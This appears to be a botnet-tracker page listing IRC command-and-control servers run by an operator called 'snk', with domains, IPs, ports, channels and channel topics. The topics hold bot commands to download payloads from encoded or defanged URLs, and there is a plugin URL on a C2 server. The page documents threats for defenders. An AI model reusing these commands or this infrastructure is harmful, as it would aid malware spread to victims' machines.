This was loaded from snk’s latest irc net. The bot is pretty strange, as it tries to connect to five unregistered domains before connecting to the ip. Here they are: amnsreiuojy.ru amnsreiuojy.in amnsreiuojy.biz amnsreiuojy.com amnsreiuojy.nl Server: 188.40.15.22 Gate file: /sg.php Plugin: http://188.40.15.22/uploads/is.s It appears to be some sort of Facebook spreader. hosting infos: http://whois.domaintools.com/188.40.15.22
srv5050.co (snk asper mod hosted by oneandone.net)
Resolved srv5050.co to 213.165.85.114, 212.227.141.241 snk is at it again Server: srv5050.co (alternate domains srv5050.su r83g9dhwuabce.net) Port: 5050 Channel: #u * Topic for #u is: .j #s .d x /100/97/111/124/49/59/47/127/124/127/58/78/114/123/105/113/116/105/108/116/46/115/121/97/48/55/55/18/43/58/44/121/85/110/127/122/107/127/30/111/81/* Topic for #u set by x at Tue Jan 29 13:46:37 2013 * Topic for #s is: .d x /100/97/111/124/49/59/47/127/124/127/58/78/114/123/105/113/116/105/108/116/46/115/121/97/48/55/96/78/112/58/117/124/16/60/118/97/101/119/21/104/74/* Topic for #s set byRead more...
srv5050.asia/pro/in (snk asper mod hosted by United Kingdom Birmingham Compuweb Communications Services Limited)
Resolved srv5050.asia to 62.255.175.157 Resolved srv5050.pro to 62.255.175.157 This is snk’s new set of domains for his bot. Server: srv5050.asia (backup domains are srv5050.pro and srv5050.in) Port: 5050 Channel: #new * Topic for #new is: .j #gt .d /100/97/111/124/49/59/47/127/124/127/58/64/116/118/98/124/102/100/48/127/101/100/57/107/112/38/96/93/121/ * Topic for #new set by x at Sun Dec 23 16:33:45 2012 Channel: #gt *Read more...
afkm.in (snk asper mod hosted by United Kingdom Birmingham Compuweb Communications Services Limited)
Resolved afkm.in to 62.255.175.157 snk is cycling through his old domains, trying to move the bots onto his new ones. Server: 62.255.175.157 Port: 5050 Channel: #$ * Topic for #$ is: .d /100/97/111/124/49/59/47/107/104/97/118/79/99/123/46/126/119/116/49/115/46/117/110/105/* Topic for #$ set by x at Sun Dec 23 14:19:00 2012 Channel: #l * Topic for #l is: .d /100/97/111/124/49/59/47/105/111/111/102/66/103/119/105/115/118/101/109/120/103/126/56/111/112/38/112/78/51/100/111/62/70/112/98/*Read more...
w4hw5wg3488h.net (snk asper mod botnet hosted by United Kingdom Birmingham Compuweb Communications Services Limited)
Resolved w4hw5wg3488h.net to 62.255.175.157 snk is back, using an old domain and buying bots from Heckforums skids. Server: w4hw5wg3488h.net Port: 5050 Channel: #$ * Topic for #$ is: , * Topic for #$ set by x at Sat Dec 22 16:42:47 2012 Channel: #lol * Topic for #lol is: .d /100/97/111/124/49/59/47/105/111/111/102/66/103/119/105/115/118/101/109/120/103/126/56/111/112/38/112/78/51/100/111/62/70/112/98/ * Topic forRead more...
w4hw5wg3488h.net (snk asper mod irc botnet hosted by Germany Karlsruhe 1&1 Internet Ag)
Resolved w4hw5wg3488h.net to 213.165.89.117 Server: w4hw5wg3488h.net Port: 5050 Channel: #oh Topic for #oh is: .d /100/97/111/124/120/46/47/39/99/103/96/69/126/115/101/62/113/111/115/62/100/124/57/61/39/57/60/23/40/61/47/33/12/63/52/35/42/41/17/103/8/85/63/104/127/118/39/98/107/73/77/ Topic for #oh set by s at Sat Dec 01 18:36:05 2012 Oper: s!x@x Talking with snk <Userbased> hey <s> sup <Userbased> cool ircd mod <s> yea <Userbased> I like the link encryption as well <Userbased> is this anRead more...
213.165.89.117 (irc botnet hosted by Germany Karlsruhe 1&1 Internet Ag)
Server: 213.165.89.117 Port: 5050 Channel: #kos Nick format: [USA|XP]hjktjel This is snk’s asper mod again. Hosting infos: http://whois.domaintools.com/213.165.89.117
zqpoetyafw.org (Chebri bot hosted by Canada Affilnet Corporation)
Resolved zqpoetyafw.org to 108.63.14.21 Server: zqpoetyafw.org Port: 20001 Note: Not an irc. Don’t waste your time trying to connect. This is one of snk’s bots. It’s being loaded from his irc. * Topic for #load is: !j -c RU,RUS #r2 !j #xtp !dl hxxp://hotfile.com/dl/178567859/27b7e85/41aa2c2d8.html * Topic for #load set by lol at Mon Nov 05Read more...